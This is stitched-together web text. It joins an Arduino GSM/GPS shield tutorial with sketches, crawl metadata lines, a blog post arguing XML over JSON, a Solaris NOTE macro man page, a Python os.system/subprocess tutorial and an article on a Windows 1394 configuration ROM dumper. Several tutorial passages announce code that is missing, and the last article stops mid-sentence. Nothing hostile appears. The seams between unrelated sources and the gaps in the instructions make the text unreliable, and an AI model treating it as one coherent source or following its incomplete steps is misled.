R4: 10 kohm
C1: 100 nF
C2: 470 µF 25 VL
C3: 100 nF
C4: 220 µF 16 VL
C5: 47 pF
C6: 47 pF
C7: 47 pF
C8: 47 pF
C9: 47 pF
C10: 47 pF
C11: 220 µF 16 VL
C12: 100 nF
CRCT: 0,1F
U1: 7805
T1: BS170
D1: 1N4007
P1: Microswitch
MIC: jack 3,5 mm
SPK: jack 3,5 mm
[/CODE]
SOFTWARE INNOVATIONS
The software library for the GSM/GPRS shield has been updated. The library is open source and is hosted on the Google Project hosting service. The library is constantly updated and improved with the addition of new features, so please check that you always have the latest release.
The main enhancement is the TCP/IP communication support through GPRS. With a simple function, you can connect Arduino to the Internet using the APN (Access Point Name) of your choice. After that, an IP address is automatically assigned by the provider. To establish communication you must define which device performs the function of the server (waiting for connections) and which the function of the client (requesting a connection to the server for the information it wants to reach), and then they can exchange data. In the library there are two functions that allow us to set the device to listen on a particular port for connections (server), or to establish a connection based on the chosen server address and port (client). Once connected, you can send the data, which can be command strings or just the data you want to monitor; for this action there is a high-level function which simplifies the management.
LIBRARY FUNCTIONS GSM GPRS
First, you must have in the libraries folder, in the root directory of the Arduino installation, the folder GSM_GPRS containing all the functions you can use. If you want to change the serial port through the jumper, you have to modify the file GSM.cpp. To save memory, we decided to divide the functions into different classes contained in different files, to allow you to include only the code parts needed, thus saving RAM and leaving it free for the rest of the program. For basic operation it is always necessary to include the files SIM900.h and SoftwareSerial.h, while depending on your needs you may include call.h (for call handling), sms.h (for sending, receiving and saving SMS) and inetGSM.h (containing functions related to HTTP and GPRS).
SIM900.h
You should always include this file. It contains the basic functions for starting and configuring the GSM module. Simply call the functions using "gsm." as a prefix.
call.h
In case you want to make a call, or simply refuse an incoming call, you must use this class. To use these functions simply instantiate the object in the sketch. The functions listed in the table below refer to an object created with the following command at the beginning of the sketch: CallGSM call;
SMS.h
For managing text messages you must use this special class. As before, it is necessary to include it within the sketch and then instantiate an object. For example, the following functions refer to an object created at the beginning of the sketch with the command SMSGSM sms;
inetGSM.h
This class includes the functions to connect and manage communications via the HTTP protocol. In the following examples an object was created with the command InetGSM inet;
EXAMPLE FOR CALLS AND SMS WITH THE GSM GPRS SHIELD
Let us now write, step by step, our first sketch using the shield with the Arduino IDE version 1.0. We will write a program that, when it receives a call from a preset number (stored in a specific location on the SIM), rejects the call and sends an SMS in response to the caller with the value read from an input. First you have to extract the files from the compressed folder into the libraries folder contained within the installation folder of Arduino. To start, load the libraries using the following commands:
#include "SIM900.h"
#include <SoftwareSerial.h>
Then load, uncommenting properly, the files related to the classes containing the functions that we want to use for the management of phone calls and SMS:
#include "sms.h"
#include "call.h"
We will perform the initialization procedure in the setup.
Set the pin to read the value which will then be sent via SMS, configure the serial communication and initialize the module with the function gsm.begin, setting the baud rate (usually, for proper data communication through GPRS, it is advisable not to rise above 4800 baud). At this point we enter the heart of the program, which will periodically check the status of incoming calls. To do this, within the loop cycle we will use the function call.CallStatusWithAuth, saving the byte it returns. In the case of an incoming or in-progress call, the caller (or recipient) number is stored in the string number. When it matches the stored value CALL_INCOM_VOICE_AUTH, which describes an incoming call from an authorized number, we reject the call using call.HangUp and, after waiting 2 seconds, read the input value and send the message. The value read is an integer and must first be converted into a string using the function itoa. Remember to insert a delay inside the loop function, to ensure that the module is interrogated at intervals of not less than a second: commands sent in rapid sequence could compromise the stability of the module. If we do not get a result indicating proper initialization, we will need to check the power supply. Remember that it is recommended to use an external power source, because the power supplied by the USB port alone is not enough. If the power is found to be correct, you should check that in the file GSM.cpp of the library the pins for the serial are declared properly. Basically, the new version uses pins 2 and 3, while the old version used pins 4 and 5:
#define _GSM_TXPIN_ 2
#define _GSM_RXPIN_ 3
The full program is as follows:
#include "SIM900.h"
#include <SoftwareSerial.h>
// load the files needed by the sketch
#include "sms.h"
#include "call.h"
CallGSM call;
SMSGSM sms;
char number[20];
byte stat=0;
int value=0;
int pin=1;
char value_str[5];
void setup()
{
  pinMode(pin,INPUT);
  Serial.begin(9600);
  Serial.println("GSM GPRS Shield");
  // init the module
  if (gsm.begin(2400))
    Serial.println("\nstatus=READY");
  else
    Serial.println("\nstatus=IDLE");
};
void loop()
{
  stat=call.CallStatusWithAuth(number,1,3);
  if(stat==CALL_INCOM_VOICE_AUTH){
    call.HangUp();
    delay(2000);
    value=digitalRead(1);
    itoa(value,value_str,10);
    sms.SendSMS(number,value_str);
  }
  delay(1000);
};
EXAMPLE FOR INTERNET
We analyze one of the examples contained in the library to connect Arduino to the Internet with a GPRS connection. We will make a program capable of receiving HTML content from a web page and saving the first 50 characters. Because we use only the functions relating to the Internet and HTTP, we load, in addition to the standard library files, the file inetGSM.h. We instantiate an object for its management functions with InetGSM inet; and as before we execute the initialization routine. Then we establish a GPRS connection. In this step you need to run the command "AT+CIFSR", which asks the provider for the IP address assigned to the GSM module. This step is important: some providers guarantee the connection only if this request has been made first. Through the function gsm.WhileSimpleRead, contained in the GSM class, we read the entire contents of the buffer. Once the buffer is emptied, the sketch moves on to the following functions. At this point we are connected; we have to establish a TCP connection with the server, send a GET request for a web page and store the contents of the response in a previously declared array. All this is done by the function HttpGet in the class inetGSM.
In addition to the server and port (80 in the case of the HTTP protocol), we have to indicate the path of the requested page. For example, if you want to download the Wikipedia page on the Arduino, reachable at the address it.wikipedia.org/wiki/Arduino_(hardware), the path will be /wiki/Arduino_(hardware) while the server is it.wikipedia.org:
numdata=inet.httpGET("it.wikipedia.org", 80, "/wiki/Arduino_(hardware)", msg, 50);
Obviously, if we wish to save a greater number of characters of the answer, it is sufficient to initialize a larger array, taking care not to saturate the RAM made available by Arduino; otherwise we risk abnormal behavior, such as stalls or restarts.
#include "SIM900.h"
#include <SoftwareSerial.h>
#include "inetGSM.h"
InetGSM inet;
char msg[50];
int numdata;
void setup()
{
  Serial.begin(9600);
  Serial.println("GSM GPRS Shield");
  // Initialization as in the previous sketches (this part of the
  // listing was truncated in the original page).
  if (gsm.begin(2400)){
    Serial.println("\nstatus=READY");
    gsm.SimpleWriteln("AT+CIFSR");
    delay(5000);
    gsm.WhileSimpleRead();
    numdata=inet.httpGET("", 80, "/", msg, 50);
    Serial.println("\nNumber of bytes received:");
    Serial.println(numdata);
    Serial.println("\nData received:");
    Serial.println(msg);
  }
};
void loop()
{
};
The shield has various connectors to accept the GSM/GPRS modules manufactured by SIMCOM and mounted on breakout boards. In addition to the popular SIM900, our new shield for Arduino supports the recent SIM908, which is an evolution and aims to capture the quad-band GSM/GPRS market by providing a variety of additional features that make it unique, especially in the field of low-cost products. The SIM908 implements a GPS with 42 channels, characterized by an excellent accuracy and a very short time to first fix (1 second in "hot start" mode and 30 seconds in "cold start" mode). This module can be powered by a lithium battery, and can charge it, greatly simplifying a process that would otherwise require dedicated hardware. The SIM908 has two serials, one used for the GSM and the other for the GPS. More exactly, the first serial interface is provided by a UART on the lines TXD, RXD, DTR, which go outside through contacts 12, 14 and 10 of the connector, respectively; for the GPS, instead, the serial is GPSTXD (contact 4) and GPSRXD (pin 5). The first serial port is actually intended for total control of the SIM908, so it can also configure the GPS receiver and ask it to provide data on the location, the number of satellites hooked, etc. From the second serial port (GPSTXD/GPSRXD), strings in the standard NMEA GPS format go out continuously.
THE GSM SHIELD LIBRARY
To support the SIM908 as well, the library for the management of this module has been modified to provide quick access to all the new features made available. The new library is derived from that used for the SIM900 module, and is available on the Internet. Note that you can use the new library for managing the SIM900 module, provided you do not call functions dedicated to the SIM908, and a sketch written for the version without GPS is completely compatible with this new one. Let's consider some of the new features introduced: first of all, the function ForceON() has been added, used to check the status of the module and to force the power on. The SIM908 supports the charging of lithium batteries: the module can be started to perform the charging without the management of the GSM network. If we want to avoid this mode and make sure it's really turned on, then you need to call the function mentioned above.
gsm.forceON();
Intended for the use of the GPS (and battery), we made a class from which you can instantiate an object with GPSGSM gps, after including its file with #include "gps.h", in order to invoke its functions by prefixing "gps." to the desired function. This subdivision into different files is designed to minimize RAM usage: for example, the variables used by the GPS class will not be allocated in memory if you do not include the relevant file with #include "gps.h". This allows you to choose which variables to use. As already mentioned, for the management of the battery there are also functions which enable the measurement of the voltage and battery temperature; for practical reasons, occupying little memory, these have been included in the GPS class. To use them, after including the file #include "gps.h", you must instantiate the related object with GPSGSM gps. The next sections show the control functions of the GPS and battery.
HOW TO USE THE SIM908 GPS
Before using the GPS, you need to do a small set-up: first, let's make a bridge on jumper J1 on the SIM908 breakout (cod. FT971). The bridge on J1 enables power to the GPS antenna; this serves to bring power to the active GPS antenna. Next, load the example sketch (in the examples directory) called GSM_GPRS_GPS_Library_AT (or even GSM_GPRSLibrary_AT) and, once launched and initialization completed, send the following commands:
AT
AT+CGPSPWR=1
AT+CGSPRST=0
We wait a minute, at which point the GPS should be working; to verify, continue by sending the command:
AT+CGPSINF=0
If you can see the coordinates, it means that everything is working and we can proceed with the standard use through the implemented functions. Now we proceed with a simple example that allows us to understand how to get the coordinates from the GPS of the SIM908 mounted on the shield; the sketch is shown here:
#include "SIM900.h"
#include <SoftwareSerial.h>
#include "gps.h"
GPSGSM gps;
char lon[10];
char lat[10];
char alt[10];
char time[15];
char vel[10];
char stat;
boolean started=false;
void setup()
{
  //Serial connection.
  Serial.begin(9600);
  Serial.println("GSM GPRS GPS Shield");
  if (gsm.begin(2400)){
    Serial.println("\nstatus=READY");
    gsm.forceON();
    started=true;
  }
  else Serial.println("\nstatus=IDLE");
  if(started){
    if (gps.attachGPS())
      Serial.println("status=GPSON");
    else Serial.println("status=ERROR");
    delay(20000);
    stat=gps.getStat();
    if(stat==1)
      Serial.println("NOT FIXED");
    else if(stat==0)
      Serial.println("GPS OFF");
    else if(stat==2)
      Serial.println("2D FIXED");
    else if(stat==3)
      Serial.println("3D FIXED");
    delay(5000);
    gps.getPar(lon,lat,alt,time,vel);
    Serial.println(lon);
    Serial.println(lat);
    Serial.println(alt);
    Serial.println(time);
    Serial.println(vel);
  }
};
void loop()
{
};
THE BATTERY
In order to use the lithium battery as the power source for our FT971 module that houses the SIM908 (note: the SIM900 is not able to manage the battery charge), it is sufficient to close the bridge called CHRG on this shield and set on VEXT the second bridge near the battery connector. Through two library functions it is possible to obtain the percentage of remaining charge, the battery voltage and the voltage read by the temperature sensor. In the case of poorly ventilated applications, with prolonged periods of work and in climatic conditions that are not exactly optimal, it is advisable to monitor this value to make sure that the battery works within the limits for correct operation.
The temperature can be calculated according to the voltage/temperature relationship of the sensor. It is also possible to set the module so that it automatically determines whether the battery is working outside the permissible range, with consequent shutdown. To activate this mode, you need to send the command:
AT+CMTE=1
To disable it you have to send the command:
AT+CMTE=0
While to know which mode is configured you must issue the command:
AT+CMTE?
The exact syntax of the battery functions and their return values can be seen in the following sketch, which shows how to use them:
#include "SIM900.h"
#include <SoftwareSerial.h>
#include "inetGSM.h"
#include "gps.h"
GPSGSM gps;
char perc[5];
char volt[6];
char tvolt[6];
long prevmillis=millis();
int interval=10000;
void setup()
{
  Serial.begin(9600);
  Serial.println("GSM GPRS GPS Shield.");
  if (gsm.begin(4800)){
    Serial.println("\nstatus=READY");
    gsm.forceON();
  }
  else
    Serial.println("\nstatus=IDLE");
};
void loop()
{
  if(millis()-prevmillis>interval){
    gps.getBattInf(perc,volt);
    gps.getBattTVol(tvolt);
    Serial.print("Battery charge: ");
    Serial.print(perc);
    Serial.println("%");
    Serial.print("Battery voltage: ");
    Serial.print(volt);
    Serial.println(" mV");
    Serial.print("Temperature sensor voltage: ");
    Serial.print(tvolt);
    Serial.println(" mV");
    Serial.println("");
    prevmillis=millis();
  }
}
DEBUG MODE GSM & GPS SHIELD
During the use of the shield, you sometimes fail to get the desired results without understanding why. To help, the libraries can be configured to output some debug messages during the execution of the functions called. Inside the file GSM.h there is the following line:
//#define DEBUG_ON
By uncommenting it you enable this mode; leaving it commented, no diagnostic message will be shown on the serial output.
HOW TO USE THE GSM & GPS SHIELD WITH ARDUINO MEGA
For problems with RAM, or simply for projects that require a larger number of inputs/outputs, we can use the GSM/GPRS & GPS shield with the Arduino Mega. Thanks to its four serial ports, we can use one of them instead of the software serial to communicate with the shield. With the latest release, the library can be used completely with the Arduino Mega. You must open the file GSM.h and select the board used by appropriately commenting the lines of code. Using the shield with Arduino Mega we comment as follows:
//#define UNO
#define MEGA
If we want to use Arduino UNO:
#define UNO
//#define MEGA
Similarly, the file HWSerial.h must also be configured. As before, we first see the example for Arduino Mega:
#define MEGA
In HWSerial.h it is not necessary to define the possible use with Arduino Uno, as the class implemented there is only used by the hardware serial. The library uses the serial Serial0 (TX 1, RX 0) for external communication and the serial Serial1 (TX1 18, RX1 19) to communicate with the SIM900 and SIM908. Nothing prevents you from replacing every occurrence of Serial1 with Serial2 or whichever one you prefer. Please note that to use the hardware serial you need to create the connection between the shield and the Arduino Mega using a bridge: the TX pin of the shield must be connected to TX1 18 and the RX pin to RX1 19.
http://www.open-electronics.org/gsm-gps-shield-for-arduino/
CC-MAIN-2016-30
en
refinedweb
JSON or XML? Which one is better? Which one is faster? Which one should I use in my next project? Stop it! These things are not comparable. It's similar to comparing a bicycle and an AMG S65. Seriously, which one is better? They both can take you from home to the office, right? In some cases, a bicycle will do it better. But does that mean they can be compared to each other? The same applies here with JSON and XML. They are very different things with their own areas of applicability. Here is how a simple JSON piece of data may look (140 characters): { "id": 123, "title": "Object Thinking", "author": "David West", "published": { "by": "Microsoft Press", "year": 2004 } } A similar document would look like this in XML (167 characters): <?xml version="1.0"?> <book id="123"> <title>Object Thinking</title> <author>David West</author> <published> <by>Microsoft Press</by> <year>2004</year> </published> </book> Looks easy to compare, right? The first example is a bit shorter, is easier to understand since it's less "cryptic," and is also perfectly parseable in JavaScript. That's it, then; let's use JSON and manifest the death of XML! Who needs this heavyweight 15-year-old XML in the first place? Well, I need it, and I love it. Let me explain why. And don't get me wrong; I'm not against JSON. Not at all. It's a good data format. But it's just a data format. We're using it temporarily to transfer a piece of data from point A to point B. Indeed, it is shorter than XML and more readable. That's it. XML is not a data format; it is a language. A very powerful one. Let me show you what it's capable of. Let me basically explain why I love it. And I would strongly recommend you read XML in a Nutshell, Third Edition by Elliotte Rusty Harold and W. Scott Means. I believe there are four features XML has that seriously set it apart from JSON or any other simple data format, like YAML for example. XPath. To get data like the year of publication from the document above, I just send an XPath query: /book/published/year/text(). However, there has to be an XPath processor that understands my request and returns 2004. The beauty of this is that XPath 2.0 is a very powerful query engine with its own functions, predicates, axes, etc. You can literally put any logic into your XPath request without writing any traversing logic in Java, for example. You may ask "How many books were published by David West in 2004?" and get an answer, just via XPath. JSON is not even close to this. Attributes and Namespaces. You can attach metadata to your data, just like it's done above with the idattribute. The data stays inside elements, just like the name of the book author, for example, while metadata (data about data) can and should be placed into attributes. This significantly helps in organizing and structuring information. On top of that, both elements and attributes can be marked as belonging to certain namespaces. This is a very useful technique during times when a few applications are working with the same XML document. XML Schema. When you create an XML document in one place, modify it a few times somewhere else, and then transfer it to yet another place, you want to make sure its structure is not broken by any of these actions. One of them may use <year>to store the publication date while another uses <date>with ISO-8601. To avoid that mess in structure, create a supplementary document, which is called XML Schema, and ship it together with the main document. 
Everyone who wants to work with the main document will first validate its correctness using the schema supplied. This is a sort of integration testing in production. RelaxNG is a similar but simpler mechanism; give it a try if you find XML Schema too complex. XSL. You can make modifications to your XML document without any Java/Ruby/etc. code at all. Just create an XSL transformation document and "apply" it to your original XML. As an output, you will get a new XML. The XSL language (it is purely functional, by the way) is designed for hierarchical data manipulations. It is much more suitable for this task than Java or any other OOP/procedural approach. You can transform an XML document into anything, including plain text and HTML. Some complain about XSL's complexity, but please give it a try. You won't need all of it, while its core functionality is pretty straight-forward. This is not a full list, but these four features really mean a lot to me. They give my document the ability to be "self-sufficient." It can validate itself (XML Schema), it knows how to modify itself (XSL), and it gives me very convenient access to anything inside it (XPath). There are many more languages, standards, and applications developed around XML, including XForms, SVG, MathML, RDF, OWL, WSDL, etc. But you are less likely to use them in a mainstream project, as they are rather "niche." JSON was not designed to have such features, even though some of them are now trying to find their places in the JSON world, including JSONPath for querying, some tools for transformations, and json-schema for validation. But they are just weak parodies compared to what XML offers, and I don't think they have any future. Or let's put it this way: I wish they would disappear sooner or later. They just turn a good, simple format into something clumsy. Thus, to conclude, JSON is a simple data format with no additional functionality. Its best-use case is AJAX. In all other cases, I strongly recommend you use XML.
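To make the XPath point concrete: the first query from this post, run with nothing but the JDK's built-in JAXP (assuming the book document is saved as book.xml):
import java.io.File;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;

public class Year {
    public static void main(String[] args) throws Exception {
        // Parse the XML document shown at the top of the post.
        Document doc = DocumentBuilderFactory.newInstance()
            .newDocumentBuilder().parse(new File("book.xml"));
        // One expression extracts the year; no traversal code needed.
        String year = XPathFactory.newInstance().newXPath()
            .evaluate("/book/published/year/text()", doc);
        System.out.println(year); // prints 2004
    }
}
The "books published by David West in 2004" question is likewise a single expression over a collection, for example count(//book[author='David West' and published/year='2004']).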
http://www.yegor256.com/2015/11/16/json-vs-xml.html
CC-MAIN-2016-30
en
refinedweb
SYNOPSIS
#include <note.h>
NOTE(NoteInfo);

or

#include <sys/note.h>
_NOTE(NoteInfo);

DESCRIPTION
These macros are used to embed information for tools in program source. A use of one of these macros is called an "annotation". A tool may define a set of such annotations which can then be used to provide the tool with information that would otherwise be unavailable from the source code. Annotations should, in general, provide documentation useful to the human reader. If information is of no use to a human trying to understand the code but is necessary for proper operation of a tool, use another mechanism for conveying that information to the tool (one which does not involve adding to the source code), so as not to detract from the readability of the source. The following is an example of an annotation which provides information of use to a tool and to the human reader (in this case, which data are protected by a particular lock, an annotation defined by the static lock analysis tool lock_lint).

NOTE(MUTEX_PROTECTS_DATA(foo_lock, foo_list Foo))

Such annotations do not represent executable code; they are neither statements nor declarations. They should not be followed by a semicolon. If a compiler or tool that analyzes C source does not understand this annotation scheme, then the tool will ignore the annotations. (For such tools, NOTE(x) expands to nothing.) Annotations may only be placed at particular places in the source. These places are where the following C constructs would be allowed:

a top-level declaration (that is, a declaration not within a function or other construct)

a declaration or statement within a block (including the block which defines a function)

a member of a struct or union.

Annotations are not allowed in any other place. For example, the following are illegal:

x = y + NOTE(...) z ;
typedef NOTE(...) unsigned int uint ;

While NOTE and _NOTE may be used in the places described above, a particular type of annotation may only be allowed in a subset of those places. For example, a particular annotation may not be allowed inside a struct or union definition.
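A minimal C sketch of a legal, top-level placement of the lock_lint annotation shown above (foo_lock and foo_count are example names, not part of the original manual):

#include <note.h>
#include <pthread.h>

static pthread_mutex_t foo_lock;
static int foo_count;

/* Top-level annotation: tells a static analyzer such as lock_lint
 * which lock protects which data. Note: no trailing semicolon. */
NOTE(MUTEX_PROTECTS_DATA(foo_lock, foo_count))

void
bump(void)
{
        pthread_mutex_lock(&foo_lock);
        foo_count++;
        pthread_mutex_unlock(&foo_lock);
}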
See attributes(5) for descriptions of the following attributes: NAME | SYNOPSIS | DESCRIPTION | ATTRIBUTES | SEE ALSO
http://docs.oracle.com/cd/E19683-01/816-5218/6mbcj7niu/index.html
CC-MAIN-2016-30
en
refinedweb
On Wed, 17 May 2006 11:51:52 +0200, Andersen wrote:
>
>Are all files on NFS stored on one central server? Or is it possible to
>distribute the load on different servers? If so, which version supports
>that?

It's possible to distribute file systems across multiple NFS servers and use a namespace of some type. The most popular namespace is the automounter, but it could be any of the newer products as well: Acopia, Neoscale, Rainstorage, etc. An example is:

/nfs/looks_like_one_fs/

But under that there are multiple directories that are each their own file system, exported from separate NFS servers but coalesced into one path structure by a namespace. Of course, this usually means users will not be able to create anything under looks_like_one_fs directly, but rather in the directories below it. Hope this helps.
~F
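A sketch of how that can look with the automounter (map file names and servers invented for the example):

# /etc/auto.master
/nfs/looks_like_one_fs   /etc/auto.onefs

# /etc/auto.onefs -- one entry per directory, each exported from its own server
proj1   server1:/export/proj1
proj2   server2:/export/proj2
home    server3:/export/home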
http://fixunix.com/nfs/61930-nfs-distributed.html
CC-MAIN-2016-30
en
refinedweb
You can execute the command in a subshell using os.system(). This will call the Standard C function system(). This function will return the exit status of the process or command. This method is considered old and not recommended, but is presented here for historical reasons only. The subprocess module is recommended; it provides more powerful facilities for running commands and retrieving their results. (The inline code snippets are missing from this copy; see the reconstruction after the comments at the end of this page.)
os.system example (deprecated)
The syntax is:
In this example, execute the date command:
Sample outputs:
Sat Nov 10 00:49:23 IST 2012
0
In this example, execute the date command using os.popen() and store its output to the variable called now:
Sample outputs:
Today is Sat Nov 10 00:49:23 IST 2012
Say hello to subprocess
os.system has many problems and subprocess is a much better way of executing unix commands. The syntax is:
In this example, execute the date command:
Sample outputs:
Sat Nov 10 00:59:42 IST 2012
0
You can pass the arguments using the following syntax, i.e. run the ls -l /etc/resolv.conf command:
Sample outputs:
-rw-r--r-- 1 root root 157 Nov 7 15:06 /etc/resolv.conf
0
To store output to the output variable, run:
Sample outputs:
Today is Sat Nov 10 01:27:52 IST 2012
Another example (passing command line args):
Sample outputs:
*** Running ls -l command ***
-rw-r--r-- 1 root root 157 Nov 7 15:06 /etc/resolv.conf
In this example, run the ping command and display back its output:
The only problem with the above code is that output, err = p.communicate() will block the next statement till ping is completed, i.e. you will not get real-time output from the ping command. So you can use the following code to get real-time output:
Sample outputs:
Related media
A quick video demo of the above python code:
Video 01: Python Run External Command And Get Output On Screen or In Variable
References:
- Python 2.x: subprocess documentation.
- Python 3.x: subprocess documentation.
307 ms? That's a long interval ;)
Hi, please more small and useful examples with python like it! more code snippets!
A very comprehensive explanation, being useful to beginners to python.
where to find the command of linux
these commands are very helpful to us... please give more examples like this. Thanks!
What exactly does shell=True do? please tell the exact usage of the shell argument.
Hi, First off, enjoy all your posts and youtube videos. Recently viewed your tutorial on installing freebsd. So thank you for sharing your knowledge. I have a query regarding launching an external bash script file (.sh) in freebsd. For linux I used: os.system('sh ' + filepath) For Mac: os.system('open ' + filepath) And for windows: os.startfile(filepath) I am unable to get any of these to work for freebsd. I know startfile is only for windows, however was wondering if there was an equivalent for freebsd without using subprocess. Or if not possible at all, how to use subprocess to call an external script. Also, in freebsd, what would be the equivalent of say: sudo chown -R user:user file.bundle as both sudo and chown are not installed by default. Any help would be appreciated. Regards, iSh0w
tnxxxxxxx
What if I want to create a variable in Python, then pass that variable to a bash command line? Something like this:
....
celsius = sensor.read_temperature()
import subprocess
subprocess.call(["myscript.sh", "-v", "-t $celsius"])
Is that possible?
Of course you can. In python's new formatting it would look like this:
subprocess.call(["myscript.sh", "-v", "-t {}".format(celsius)])
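The snippets that accompanied the examples above, reconstructed to match the sample outputs (the ping host is illustrative; the rest is plain Python 2.x os/subprocess usage, not the author's original code):

# os.system example (deprecated): runs date, then prints the exit status (0)
import os
ret = os.system("date")
print ret

# os.popen example: capture the output in the variable now instead
now = os.popen("date").read().strip()
print "Today is %s" % now

# subprocess.call: the return value is the exit status
import subprocess
ret = subprocess.call("date")
print ret

# passing arguments as a list
subprocess.call(["ls", "-l", "/etc/resolv.conf"])

# storing the output in a variable (Python 2.7+)
now = subprocess.check_output("date").strip()
print "Today is %s" % now

# another example (passing command line args)
p = subprocess.Popen(["ls", "-l", "/etc/resolv.conf"], stdout=subprocess.PIPE)
output, err = p.communicate()
print "*** Running ls -l command ***"
print output

# ping: communicate() blocks until the command finishes...
p = subprocess.Popen(["ping", "-c", "4", "www.cyberciti.biz"], stdout=subprocess.PIPE)
output, err = p.communicate()
print output

# ...so read line by line for real-time output
p = subprocess.Popen(["ping", "-c", "4", "www.cyberciti.biz"], stdout=subprocess.PIPE)
while True:
    line = p.stdout.readline()
    if not line:
        break
    print line.rstrip()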
http://www.cyberciti.biz/faq/python-execute-unix-linux-command-examples/
CC-MAIN-2016-30
en
refinedweb
Bill is a senior software engineer at LSI Logic (formerly Symbios Logic). His current responsibilities include developing 1394 device drivers, software, and utilities. He can be contacted at .geocities.com/SiliconValley/Haven/4824.
In the August, 1999, issue of DDJ, I wrote the article "An IEEE 1394 Configuration ROM Decoder." That article discussed how to read and decode the configuration ROM of 1394 peripherals on Windows 95 using the Texas Instruments TSBKPCI 1394 controller and the TI LynxSoft drivers. In this article, I'll present a new version of the DumpRom utility that runs on Windows 98 and Windows 2000. (The complete source code to this version of DumpRom is available electronically; see "Resource Center," page 5.)
On Windows 98 and Windows 2000, Microsoft's 1394 architecture is much more complicated than that of TI's LynxSoft on Windows 95. Microsoft's architecture is based on the Windows Driver Model (WDM) and is a multilayered design. The most important layer in this design is 1394BUS.SYS, which is also known as the 1394 bus class driver. 1394BUS.SYS is responsible for presenting a unified, low-level interface to 1394. Underneath 1394BUS.SYS are the 1394 port drivers. These drivers are responsible for communicating directly to the various 1394 controllers. The port drivers shipped with Windows 98 include:
- OHCI1394.SYS, port driver for the Open Host Controller Interface 1394 controllers.
- TILYNX.SYS, port driver for the TI TSBKPCI and TSBKPCI403 1394 controllers.
- AHA894X.SYS, port driver for the Adaptec AHA894X 1394 controllers.
On top of 1394BUS.SYS are the higher level drivers that control different categories of peripherals connected to the 1394 bus. Those I am familiar with include:
- SBP2.SYS, file system driver for the 1394 disk drives.
- SONYDCAM.SYS, video driver for the Sony CCM-DS250 and TI MC680-DCC 1394 digital cameras.
These high-level drivers, in turn, connect with various other subsystems. For example, SONYDCAM.SYS registers with the streaming drivers as a source of video. SBP2.SYS, on the other hand, registers with the SCSI subsystem to provide a source of file storage; see Figure 1.
Windows 1394 API
As far as I know, Microsoft has not published a 1394 API for applications to use directly. Luckily, the Windows 98 DDK provides the source to an application/driver combination that can be used to test and debug 1394 devices. These files are named Win1394.EXE and 1394Diag.SYS. Win1394.EXE is a Win32 application that communicates with the driver. 1394Diag.SYS is a WDM driver that registers with the system as the handler of diagnostic 1394 peripherals. A diagnostic peripheral is one that is plugged into the system when the 1394 port driver is in diagnostic mode. This is a special mode of the port driver that allows you to circumvent the normal binding of a device to higher level drivers. The binding of the device is then rerouted to a custom driver that is used to test and debug the device. Using the DDK source as a base, I ported the source code from the previous article into the new DumpRom.EXE utility. DumpRom.EXE uses the WDM driver DumpRomD.SYS to communicate with diagnostic 1394 peripherals.
DumpRom Installation and Device Recognition
Along with the source code to the WDM version of DumpRom, I have included a setup program that will install the source and executables. To install DumpRom, unzip WDUMPROM.ZIP onto a floppy disk. Then run SETUP.EXE from the floppy.
SETUP will copy the files onto your hard drive and create task bar links to the DumpRom utility and documents. The default installation directory is C:\98ddk\src\1394\DumpRom\.
To install a diagnostic 1394 device, you must first launch DumpRom. From the task bar, select Start|Programs|Alexander|WDM Dump ROM|DumpRom. DumpRom will not automatically put the 1394 port driver into diagnostic mode. To do this, select 1394 Device|Find Device. The Find Device code puts the 1394 port driver into diagnostic mode. At this point, connecting a 1394 device will cause the bus class driver to detect a new diagnostic device and Windows will look for INF files that contain an entry for 1394\031887&040892 type devices. Windows will now prompt you for the location of the INF file. Inside of DumpRomD.INF, Windows will find the following entry under the Alexander manufacturer section:
[Alexander]
; Generic Diagnostic Device
%1394\031887&040892.DeviceDesc%=DumpRom,1394\031887&040892
This entry identifies DumpRomD.SYS as the handler of all 1394 diagnostic devices. All diagnostic devices are listed in the Windows 98 and Windows 2000 registry under the key HKLM\SYSTEM\CurrentControlSet\Enum\1394\031887&040892. Under this key, each diagnostic peripheral will have a subkey that is the byte-wise reversal of the device's global unique ID (GUID) stripped of leading zeros. For instance, my LSI SYM13FW500 1394-to-ATA/ATAPI bridge has the GUID 0x00A0B80000005009. So the subkey in the registry is 950000000B8A000. Next, Windows will locate the DumpRomD.SYS driver and copy it to the C:\Windows\System32\Drivers directory. DumpRomD.SYS is dynamically loadable and should now be servicing the device. If DumpRom cannot find the device, you'll need to bring up the Device Manager and try to delete and reinstall the device. If this does not work, try the Update Driver button and direct Windows to use DumpRomD.SYS.
Dumping and Decoding the Configuration ROM
Once the device has been found and DumpRomD.SYS has been loaded, you can now read the configuration ROM and display it by selecting 1394 Device|Dump Configuration ROM. As you can see in Listing One, the output is very much like that in the Windows 95 version of DumpRom.
Disconnecting the Device
After reading and decoding the configuration ROM, the only other option you have is to disconnect from the device. You can do this by selecting 1394 Device|Disconnect from Device. The disconnect code takes the 1394 port driver out of diagnostic mode and then prompts the user to physically disconnect the device from the 1394 bus. A word of caution here: A device will continue to look like a diagnostic device until the port driver is out of diagnostic mode and the device is disconnected from the bus. Just taking the port driver out of diagnostic mode is not good enough. Disconnecting the device forces the port driver to remove the device from its topology map. When the device is reconnected, it will be reenumerated as a normal device and will be bound to the driver that handles that device category.
How the New Code Works
Because this is a follow-up from a previous article, I will not discuss the decode algorithm. The issues that are of interest are as follows:
- Placing the 1394 bus class driver into diagnostic mode.
- Binding DumpRomD.SYS to a device.
- Interfacing to DumpRomD.SYS.
- Interfacing to 1394BUS.SYS.
Before any device can be recognized as a diagnostic device, you must first select 1394 Device|Find Device to place the 1394 port driver, 1394BUS.SYS, into diagnostic mode.
When this menu item is selected, DumpRom calls the Find1394Device() routine. Find1394Device() is a fairly simple routine that will prompt users to disconnect the target 1394 device, place the bus into diagnostic mode, prompt users to reconnect the device, and then confirm that there is a diagnostic device attached. To place the bus in diagnostic mode, Find1394Device() calls the DiagnoseAllAdapters() routine. Before discussing DiagnoseAllAdapters(), I must explain a little about 1394BUS.SYS. Because 1394BUS.SYS is a class driver, it can have multiple port drivers underneath it. As a result, the class driver actually looks like a collection of 1394 buses to the system and you must place each bus or port into diagnostic mode. Port is an unfortunate naming with 1394. In Windows, port means the 1394 port driver that is controlling a 1394 adapter. Do not confuse this with the physical 1394 ports on the adapter to which you connect peripherals. There are generally three physical ports on a 1394 adapter, but to Windows, all three of these physical ports are handled by only one port driver. To avoid confusion, I called my function DiagnoseAllAdapters() instead of DiagnoseAllPorts(). When DiagnoseAllAdapters() is called, it enters a loop that will open all 1394 buses and put them into diagnostic mode. To open the first 1394 bus, the 